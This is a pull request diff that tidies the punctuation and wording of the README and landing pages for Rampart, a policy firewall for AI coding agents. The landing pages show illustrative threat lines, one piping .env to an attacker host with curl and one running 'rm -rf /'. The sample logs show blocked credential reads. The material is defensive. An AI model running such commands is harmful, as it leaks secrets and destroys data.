### PR TITLE
docs: tighten README and landing page voice

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 <div align="center">
 
-# 🛡️ Rampart
+# Rampart
 
 **A firewall for AI coding agents.**
 
@@ -14,7 +14,7 @@
 
 ---
 
-Claude Code's `--dangerously-skip-permissions` mode — and similar autonomous modes in Cline and Codex — give agents unrestricted shell access. Your agent can read your SSH keys, exfiltrate your `.env`, or `rm -rf /` with no guardrails.
+Claude Code's `--dangerously-skip-permissions` mode, and similar autonomous modes in Cline and Codex, give agents unrestricted shell access. Your agent can read your SSH keys, exfiltrate your `.env`, or `rm -rf /` with no guardrails.
 
 Rampart sits between the agent and your system. Every command, file access, and network request is evaluated against your policy before it executes. Dangerous commands never run.
 
@@ -23,7 +23,7 @@ Rampart sits between the agent and your system. Every command, file access, and 
 ## Install
 
 ```bash
-# Homebrew (macOS and Linux) — recommended
+# Homebrew (macOS and Linux, recommended)
 brew install peg/tap/rampart
 
 # One-line install (no sudo required)
@@ -78,13 +78,13 @@ rampart watch
 Once running, every tool call goes through Rampart's policy engine first:
 
 ```
-✅ 14:23:01  exec  "npm test"                          [allow-dev]
-✅ 14:23:03  read  ~/project/src/main.go                [default]
-🔴 14:23:05  exec  "rm -rf /tmp/*"                      [block-destructive]
-🟡 14:23:08  exec  "curl https://api.example.com"       [log-network]
-👤 14:23:10  exec  "kubectl apply -f prod.yaml"         [ask]
-🔴 14:23:12  resp  read .env                            [block-credential-leak]
-                    → blocked: response contained AWS_SECRET_ACCESS_KEY
+ALLOW 14:23:01  exec  "npm test"                      [allow-dev]
+ALLOW 14:23:03  read  ~/project/src/main.go            [default]
+DENY  14:23:05  exec  "rm -rf /tmp/*"                  [block-destructive]
+LOG   14:23:08  exec  "curl https://api.example.com"   [log-network]
+ASK   14:23:10  exec  "kubectl apply -f prod.yaml"     [ask]
+DENY  14:23:12  resp  read .env                        [block-credential-leak]
+                  -> blocked: response contained AWS_SECRET_ACCESS_KEY
 ```
 
 ---
@@ -106,7 +106,7 @@ Pattern matching handles 95%+ of decisions in microseconds. The optional [rampar
 | **System-wide** | `rampart preload -- <cmd>` | LD_PRELOAD syscall interception |
 
 <div align="center">
-<img src="docs/watch.png" alt="rampart watch — live audit dashboard" width="700">
+<img src="docs/watch.png" alt="rampart watch live audit dashboard" width="700">
 </div>
 
 <details>
@@ -126,7 +126,7 @@ Pattern matching handles 95%+ of decisions in microseconds. The optional [rampar
 
 ## Claude Code
 
-Native integration through Claude Code's hook system — every Bash command, file read, and write goes through Rampart before execution:
+Native integration through Claude Code's hook system. Every Bash command, file read, and write goes through Rampart before execution:
 
 ```bash
 # Install background service
@@ -167,11 +167,11 @@ In practice, that means:
 
 ### What the plugin protects
 
-**1. Native plugin** — evaluates tool calls in `before_tool_call`, blocks deny decisions immediately, and routes selective exec approvals through OpenClaw's native approval UI.
+**1. Native plugin**: evaluates tool calls in `before_tool_call`, blocks deny decisions immediately, and routes selective exec approvals through OpenClaw's native approval UI.
 
-**2. Selective native approvals** — Rampart decides when an exec should require approval, and OpenClaw shows the approval card only for those matched commands.
+**2. Selective native approvals**: Rampart decides when an exec should require approval, and OpenClaw shows the approval card only for those matched commands.
 
-**3. Bundled policy profile** — installs the OpenClaw-focused policy profile used by the plugin setup.
+**3. Bundled policy profile**: installs the OpenClaw-focused policy profile used by the plugin setup.
 
 ### Legacy compatibility path
 
@@ -202,7 +202,7 @@ rampart preload -- codex
 rampart preload -- python my_agent.py
 rampart preload -- node agent.js
 
-# Monitor mode — log only, no blocking
+# Monitor mode: log only, no blocking
 rampart preload --mode monitor -- risky-tool
 ```
 
@@ -314,7 +314,7 @@ Use `action: ask` to trigger an approval prompt:
 # When "npm install lodash" gets denied:
 #   💡 To allow this: rampart allow "npm install *"
 rampart allow "npm install *"
-#  ✓ Rule added — policy reloaded (12 rules active)
+#  Rule added; policy reloaded (12 rules active)
 ```
 
 **Evaluation:** Deny always wins. Lower priority number = evaluated first. Four actions: `deny`, `ask`, `watch`, `allow`.
@@ -334,7 +334,7 @@ rampart init --project
 ```bash
 rampart init --profile standard    # allow-by-default, blocks dangerous commands
 rampart init --profile paranoid    # deny-by-default, explicit allowlist
-rampart init --profile ci          # strict — all approvals become hard denies
+rampart init --profile ci          # strict; all approvals become hard denies
 rampart init --profile yolo        # log-only, no blocking
 ```
 
@@ -376,7 +376,7 @@ Pending approvals expire after 2 minutes by default (`--approval-timeout` to cha
 
 ## Audit trail
 
-Every tool call logged to hash-chained JSONL — tamper with any record and the chain breaks:
+Every tool call is logged to hash-chained JSONL. Tamper with any record and the chain breaks:
 
 ```bash
 rampart audit tail --follow    # Stream events
@@ -390,7 +390,7 @@ rampart audit search           # Query by tool, agent, decision, time range
 ## Live dashboard
 
 ```bash
-rampart watch           # TUI — live colored event stream
+rampart watch           # TUI: live colored event stream
 ```
 
 Web dashboard at **http://localhost:9090/dashboard/** when `rampart serve` is running. Three tabs: live stream, history, and a policy REPL to test commands before they run.
@@ -439,7 +439,7 @@ rules:
       fail_open: true
 ```
 
-See [rampart-verify](https://github.com/peg/rampart-verify) — an optional LLM sidecar for ambiguous commands (~$0.0001/call).
+See [rampart-verify](https://github.com/peg/rampart-verify), an optional LLM sidecar for ambiguous commands (~$0.0001/call).
 
 ---
 
@@ -472,7 +472,7 @@ Policy evaluation in single-digit microseconds:
 
 ## Security recommendations
 
-**Self-modification protection.** Agents cannot bypass their own policy by running `rampart allow` or `rampart block` — these are blocked when executed by an agent. Policy modifications must be made by a human.
+**Self-modification protection.** Agents cannot bypass their own policy by running `rampart allow` or `rampart block`. Those commands are blocked when executed by an agent. Policy modifications must be made by a human.
 
 **Don't run your AI agent as root.** Root access defeats user separation. Run agent frameworks as an unprivileged user.
 
@@ -488,13 +488,13 @@ Rampart maps to the [OWASP Top 10 for Agentic Applications](https://genai.owasp.
 
 | Risk | Coverage |
 |------|----------|
-| **ASI02: Tool Misuse** | ✅ Every tool call evaluated before execution |
-| **ASI05: Unexpected Code Execution** | ✅ Pattern matching + optional LLM verification |
-| **ASI08: Data Exfiltration** | ✅ Domain blocking, credential response scanning |
-| **ASI09: Human-Agent Trust** | ✅ `ask` actions enforce human-in-the-loop |
-| **ASI10: Rogue Agents** | ✅ Hash-chained audit trail, response scanning |
-| **ASI01: Goal Hijack** | 🟡 Policy limits blast radius even if goals are altered |
-| **ASI06: Context Poisoning** | 🟡 Response scanning blocks credentials from context window |
+| **ASI02: Tool Misuse** | Yes: every tool call is evaluated before execution |
+| **ASI05: Unexpected Code Execution** | Yes: pattern matching plus optional LLM verification |
+| **ASI08: Data Exfiltration** | Yes: domain blocking and credential response scanning |
+| **ASI09: Human-Agent Trust** | Yes: `ask` actions enforce human-in-the-loop |
+| **ASI10: Rogue Agents** | Yes: hash-chained audit trail and response scanning |
+| **ASI01: Goal Hijack** | Partial: policy limits blast radius even if goals are altered |
+| **ASI06: Context Poisoning** | Partial: response scanning blocks credentials from context window |
 | **ASI07: Inter-Agent Communication** | ❌ Not addressed |
 
 [Full OWASP mapping →](https://docs.rampart.sh/reference/owasp-mapping/)
@@ -528,7 +528,7 @@ rampart serve stop                           # Stop background server
 rampart doctor                               # Health check (colored output)
 rampart doctor --fix                         # Auto-apply missing patches
 rampart doctor --json                        # Machine-readable (exit 1 on issues)
-rampart status                               # Quick dashboard — what's protected
+rampart status                               # Quick dashboard: what's protected
 rampart watch                                # Live TUI event stream
 
 # Policy
@@ -635,7 +635,7 @@ Use `GET /v1/status` for server health or `GET /v1/policies` to list active poli
 
 Rampart blocks. [Snare](https://snare.sh) catches.
 
-Snare plants canary tokens in your AI agent's environment — API keys, cloud credentials, file paths. If your agent (or something that compromised it) uses those tokens, you get an instant alert.
+Snare plants canary tokens in your AI agent's environment - API keys, cloud credentials, file paths. If your agent, or something that compromised it, uses those tokens, you get an instant alert.
 
 **Rampart + Snare = preventive + detective controls.** Use both.
 

--- a/docs-site/index.html
+++ b/docs-site/index.html
@@ -4,11 +4,11 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>AI Agent Firewall for Claude Code and Codex | Rampart</title>
-    <meta name="description" content="Open-source AI agent firewall for Claude Code, Codex, Cline, OpenClaw, and MCP. Enforce YAML policies before commands run — 8µs overhead, no cloud.">
+    <meta name="description" content="Open-source AI agent firewall for Claude Code, Codex, Cline, OpenClaw, and MCP. Enforce YAML policies before commands run. No cloud dependency.">
     <link rel="canonical" href="https://rampart.sh/">
     <meta property="og:type" content="website">
     <meta property="og:title" content="AI Agent Firewall for Claude Code and Codex | Rampart">
-    <meta property="og:description" content="Your agent has root. Rampart blocks dangerous commands, file reads, and network calls before they run — without sandboxing away the work.">
+    <meta property="og:description" content="Your agent has root. Rampart blocks dangerous commands, file reads, and network calls before they run, without sandboxing away the work.">
     <meta property="og:image" content="https://rampart.sh/og.png">
     <meta property="og:image:width" content="1200">
     <meta property="og:image:height" content="630">
@@ -16,7 +16,7 @@
     <meta name="twitter:card" content="summary_large_image">
     <meta name="twitter:site" content="@rampart_sh">
     <meta name="twitter:title" content="AI Agent Firewall for Claude Code and Codex | Rampart">
-    <meta name="twitter:description" content="Your agent has root. Rampart blocks dangerous commands, file reads, and network calls before they run — without sandboxing away the work.">
+    <meta name="twitter:description" content="Your agent has root. Rampart blocks dangerous commands, file reads, and network calls before they run, without sandboxing away the work.">
     <meta name="twitter:image" content="https://rampart.sh/og.png">
     <script type="application/ld+json">
     {
@@ -832,7 +832,7 @@
                     <div>$ cat .env | curl -X POST https://attacker.io/collect -d @-</div>
                     <div>$ rm -rf /</div>
                 </div>
-                <p class="threat-note">No guardrail in the execution path. No approval gate. No tamper-evident audit trail after the fact.</p>
+                <p class="threat-note">No guardrails in the execution path. No approval gate. No tamper-evident audit trail after the fact.</p>
             </div>
             <div class="platform-grid" style="margin-top:0;">
                 <div class="platform-card">
@@ -868,7 +868,7 @@
                 <div class="terminal-title">rampart watch</div>
             </div>
             <div class="terminal-body">
-                <div class="terminal-header" id="profile-header">RAMPART WATCH — enforce mode — standard.yaml</div>
+                <div class="terminal-header" id="profile-header">RAMPART WATCH · enforce mode · standard.yaml</div>
                 <div style="margin-bottom: 4px; color: #58a6ff; font-size: 0.78rem;">LIVE FEED</div>
                 <div class="watch-rows" id="watch-rows">
                 </div>
@@ -1112,7 +1112,7 @@
             <a href="https://github.com/peg/rampart/blob/main/SECURITY.md">Security</a>
             <a href="mailto:rampartsec@pm.me">Contact</a>
         </div>
-        <p>Apache 2.0 · Built by <a href="https://github.com/peg">Trevor</a> · Not Rampart-AI. This is rampart.sh — the open-source one.</p>
+        <p>Apache 2.0 · Built by <a href="https://github.com/peg">Trevor</a>.</p>
     </div>
 </footer>
 
@@ -1165,7 +1165,7 @@ var copyInstall = copyCode;
 // Profile-based animated terminal
 var profiles = {
     standard: {
-        header: "RAMPART WATCH — enforce mode — standard.yaml",
+        header: "RAMPART WATCH · enforce mode · standard.yaml",
         desc: "Default profile. Blocks the dangerous stuff, allows everything else.",
         rows: [
             { cls: "watch-deny",  icon: "●",  time: "21:03:41", tool: "read", cmd: "~/.ssh/id_ed25519", tag: "[no-ssh-keys]" },
@@ -1180,7 +1180,7 @@ var profiles = {
         footer: "STATS: 8 total | 3 allow | 3 deny | 1 ask | 1 resp-block"
     },
     paranoid: {
-        header: "RAMPART WATCH — enforce mode — paranoid.yaml",
+        header: "RAMPART WATCH · enforce mode · paranoid.yaml",
         desc: "Deny-by-default. Only explicitly allowed commands get through.",
         rows: [
             { cls: "watch-allow", icon: "✔",  time: "21:03:41", tool: "exec", cmd: "git status", tag: "[dev-tools-allowlist]" },
@@ -1192,10 +1192,10 @@ var profiles = {
             { cls: "watch-deny",  icon: "●",  time: "21:03:47", tool: "exec", cmd: "pip install requests", tag: "[default-deny]" },
             { cls: "watch-deny",  icon: "●",  time: "21:03:48", tool: "write", cmd: "/etc/hosts", tag: "[default-deny]" }
         ],
-        footer: "STATS: 8 total | 3 allow | 5 deny — only allowlisted commands pass"
+        footer: "STATS: 8 total | 3 allow | 5 deny | only allowlisted commands pass"
     },
     monitor: {
-        header: "RAMPART WATCH — monitor mode — observe before enforcing",
+        header: "RAMPART WATCH · monitor mode · observe before enforcing",
         desc: "Watch everything without blocking. Use the audit log to generate rules.",
         rows: [
             { cls: "watch-allow", icon: "✔",  time: "21:03:41", tool: "exec", cmd: "git clone https://github.com/peg/rampart", tag: "[logged]" },
@@ -1207,7 +1207,7 @@ var profiles = {
             { cls: "watch-allow", icon: "✔",  time: "21:03:47", tool: "read", cmd: ".env", tag: "[logged]" },
             { cls: "watch-allow", icon: "✔",  time: "21:03:48", tool: "exec", cmd: "rampart init --from-audit", tag: "[logged]" }
         ],
-        footer: 'STATS: 8 total | 8 logged | 0 blocked — run <span style="color:var(--accent);">rampart init --from-audit</span> to generate rules'
+        footer: 'STATS: 8 total | 8 logged | 0 blocked | run <span style="color:var(--accent);">rampart init --from-audit</span> to generate rules'
     }
 };
 

--- a/docs/index.html
+++ b/docs/index.html
@@ -4,11 +4,11 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>AI Agent Firewall for Claude Code and Codex | Rampart</title>
-    <meta name="description" content="Open-source AI agent firewall for Claude Code, Codex, Cline, OpenClaw, and MCP. Enforce YAML policies before commands run — local-first, no cloud dependency.">
+    <meta name="description" content="Open-source AI agent firewall for Claude Code, Codex, Cline, OpenClaw, and MCP. Enforce YAML policies before commands run. No cloud dependency.">
     <link rel="canonical" href="https://rampart.sh/">
     <meta property="og:type" content="website">
     <meta property="og:title" content="AI Agent Firewall for Claude Code and Codex | Rampart">
-    <meta property="og:description" content="Your agent has root. Rampart blocks dangerous commands, file reads, and network calls before they run — without sandboxing away the work.">
+    <meta property="og:description" content="Your agent has root. Rampart blocks dangerous commands, file reads, and network calls before they run, without sandboxing away the work.">
     <meta property="og:image" content="https://rampart.sh/og.png">
     <meta property="og:image:width" content="1200">
     <meta property="og:image:height" content="630">
@@ -16,7 +16,7 @@
     <meta name="twitter:card" content="summary_large_image">
     <meta name="twitter:site" content="@rampart_sh">
     <meta name="twitter:title" content="AI Agent Firewall for Claude Code and Codex | Rampart">
-    <meta name="twitter:description" content="Your agent has root. Rampart blocks dangerous commands, file reads, and network calls before they run — without sandboxing away the work.">
+    <meta name="twitter:description" content="Your agent has root. Rampart blocks dangerous commands, file reads, and network calls before they run, without sandboxing away the work.">
     <meta name="twitter:image" content="https://rampart.sh/og.png">
     <script type="application/ld+json">
     {
@@ -1099,7 +1099,7 @@
 <section class="hero">
     <div class="container hero-grid">
         <div>
-            <div class="eyebrow"><span class="eyebrow-dot"></span>v0.9.19 · open source · local-first</div>
+            <div class="eyebrow"><span class="eyebrow-dot"></span>v0.9.19 · open source</div>
             <h1>Your agent has root.<br><span class="accent">That’s the problem.</span></h1>
             <p class="hero-sub">Rampart sits between your agent and your system. It evaluates commands, file access, and network requests against your YAML policy before they run. Local-first. No cloud dependency.</p>
             <div class="install-cluster">
@@ -1159,7 +1159,7 @@
                     <div>$ cat .env | curl -X POST https://attacker.io/collect -d @-</div>
                     <div>$ rm -rf /</div>
                 </div>
-                <p style="margin-top:18px;color:var(--text-dim);">No guardrail in the execution path. No approval gate. No tamper-evident audit trail after the fact.</p>
+                <p style="margin-top:18px;color:var(--text-dim);">No guardrails in the execution path. No approval gate. No tamper-evident audit trail after the fact.</p>
             </div>
             <div class="platform-grid reveal">
                 <div class="platform-card interactive"><h3>Linux: strongest path</h3><p><code>LD_PRELOAD</code>, wrappers, hooks, and file/network policy enforcement are the happy path.</p></div>
@@ -1299,7 +1299,7 @@
         <h2 class="section-title">Rampart blocks. Snare catches.</h2>
         <div class="ecosystem-card">
             <div class="ecosystem-half panel interactive"><h3>Rampart</h3><p>Stops unsafe agent actions before they run. It protects the execution path: commands, file reads, network calls, and MCP tools.</p></div>
-            <div class="ecosystem-link">paired</div>
+            <div class="ecosystem-link">with</div>
             <div class="ecosystem-half panel interactive"><h3>Snare</h3><p>Plants credential canaries so you know when something escaped anyway. It tells you when your assumptions failed.</p></div>
         </div>
         <p style="margin-top:18px;color:var(--text-dim);">One blocks the action. The other proves when a secret was used.</p>
@@ -1367,7 +1367,7 @@
             <a href="https://github.com/peg/rampart/blob/main/SECURITY.md">Security</a>
             <a href="mailto:rampartsec@pm.me">Contact</a>
         </div>
-        <p>Apache 2.0 · Built by <a href="https://github.com/peg">Trevor</a> · Not Rampart-AI. This is rampart.sh — the open-source one.</p>
+        <p>Apache 2.0 · Built by <a href="https://github.com/peg">Trevor</a>.</p>
     </div>
 </footer>
 


### PR DESCRIPTION
## Summary
- tighten README and landing page copy
- simplify footer and metadata wording
- keep docs-site and the deployed landing page aligned

## Testing
- inspected final diffs directly
- verified punctuation/style cleanup in README and landing page files
